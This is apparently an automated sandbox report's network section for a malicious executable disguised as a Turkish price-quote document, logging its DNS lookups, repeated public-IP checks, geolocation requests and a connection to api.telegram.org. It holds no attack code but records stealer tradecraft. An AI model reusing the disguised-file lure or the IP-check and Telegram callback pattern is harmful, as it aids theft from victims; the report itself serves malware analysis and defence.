                                                                                      Jan 9, 2025 19:01:30.750473976 CET49804443192.168.2.7149.154.167.220

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 9, 2025 19:01:07.195988894 CET5791553192.168.2.71.1.1.1
                                                                                      Jan 9, 2025 19:01:07.203324080 CET53579151.1.1.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:08.868993998 CET6384453192.168.2.71.1.1.1
                                                                                      Jan 9, 2025 19:01:08.876668930 CET53638441.1.1.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:22.401103973 CET5761553192.168.2.71.1.1.1
                                                                                      Jan 9, 2025 19:01:22.407931089 CET53576151.1.1.1192.168.2.7

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 9, 2025 19:01:07.195988894 CET192.168.2.71.1.1.10xe49fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:08.868993998 CET192.168.2.71.1.1.10x39beStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:22.401103973 CET192.168.2.71.1.1.10x2341Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 9, 2025 19:01:07.203324080 CET1.1.1.1192.168.2.70xe49fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:07.203324080 CET1.1.1.1192.168.2.70xe49fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:07.203324080 CET1.1.1.1192.168.2.70xe49fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:07.203324080 CET1.1.1.1192.168.2.70xe49fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:07.203324080 CET1.1.1.1192.168.2.70xe49fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:07.203324080 CET1.1.1.1192.168.2.70xe49fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:08.876668930 CET1.1.1.1192.168.2.70x39beNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:08.876668930 CET1.1.1.1192.168.2.70x39beNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:08.876668930 CET1.1.1.1192.168.2.70x39beNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:08.876668930 CET1.1.1.1192.168.2.70x39beNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:08.876668930 CET1.1.1.1192.168.2.70x39beNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:08.876668930 CET1.1.1.1192.168.2.70x39beNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:08.876668930 CET1.1.1.1192.168.2.70x39beNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 19:01:22.407931089 CET1.1.1.1192.168.2.70x2341No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • reallyfreegeoip.org
                                                                                      • api.telegram.org
                                                                                      • checkip.dyndns.org

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.749701132.226.8.169806368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 9, 2025 19:01:07.220386982 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 9, 2025 19:01:08.508838892 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                      Jan 9, 2025 19:01:08.516191006 CET127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 9, 2025 19:01:08.832552910 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                      Jan 9, 2025 19:01:09.903422117 CET127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 9, 2025 19:01:10.188575983 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.749710132.226.8.169806368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 9, 2025 19:01:10.986043930 CET127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 9, 2025 19:01:12.271039963 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:12 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.749714132.226.8.169806368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 9, 2025 19:01:12.969257116 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 9, 2025 19:01:14.022439003 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.749716132.226.8.169806368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 9, 2025 19:01:14.632700920 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 9, 2025 19:01:15.443716049 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.749718132.226.8.169806368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 9, 2025 19:01:16.285727024 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 9, 2025 19:01:17.106971025 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:16 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.749726132.226.8.169806368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 9, 2025 19:01:17.781234026 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 9, 2025 19:01:18.607762098 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:18 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.749733132.226.8.169806368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 9, 2025 19:01:19.237478018 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 9, 2025 19:01:20.016908884 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:19 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.749745132.226.8.169806368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 9, 2025 19:01:20.697515965 CET151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 9, 2025 19:01:21.469355106 CET273INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:21 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.749704104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-09 18:01:09 UTC864INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:09 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760458
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GIAZboZaRZRjp%2FVkzOs9JHt%2B%2B6lkwL2KA1dIPG%2BNdo6ynu2%2FStjwpupc2dpO6p9BWvfW77tGX4n11T%2BC37YxFCN9L3HwqEKYVOcFUEGSWnsAaWXnXD6XYH3OVACB8pk6GhD2u86W"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff654bc6b8a424b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=23777&min_rtt=2198&rtt_var=13781&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1328480&cwnd=248&unsent_bytes=0&cid=303f494c7cfa548c&ts=392&x=0"
                                                                                      2025-01-09 18:01:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.749706104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:10 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2025-01-09 18:01:10 UTC856INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:10 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760460
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5klob8abj0IEEyUok%2BaRTg5HeL5IfMBU%2FbubA1gMkIrhKzv9WO3EZWXb58a4GGRE7yO%2FEIq%2FbQQhVXBqY2u8zSpZ8luoaEAgqhey7xpLlJ6spl0zbIEywlkLo8PWOJ8CMSi2Uh1p"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff654c33fc4727b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2071&rtt_var=1035&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=32732&cwnd=234&unsent_bytes=0&cid=ee99bedb4a0b994d&ts=287&x=0"
                                                                                      2025-01-09 18:01:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.749713104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-09 18:01:12 UTC855INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:12 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760462
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHznjKbR38VQWHCHN%2Bz77kLyCHZsy32cnaBLRZjp7L76fIxIH3T4UNF4JsxxN8dBGlZ4D%2Fsq54gztwlzPMogWK0HnTR%2FIDkvSKiMkw%2Bgjjk1Du8eM4GhUDeMcR727a7kiS50Frt4"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff654cf5f2ec34f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=71169&cwnd=181&unsent_bytes=0&cid=20cb4ae479e7c7b3&ts=166&x=0"
                                                                                      2025-01-09 18:01:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.749715104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:14 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-09 18:01:14 UTC859INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:14 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760463
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aP3B1n43OMvTH3Tlpklbeyy%2FwVUiQ%2Fd4vJnBQww4nwyIHFodMG2eDxJp%2FMgRfksj8jxNBygpPYgegnkf8e11Re%2F6EmfF%2FpPWKAWZ2jP8yubpd5U1n7sTcHb8gZcLW7wIINDQf9o4"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff654d9fc570f5b-EWR
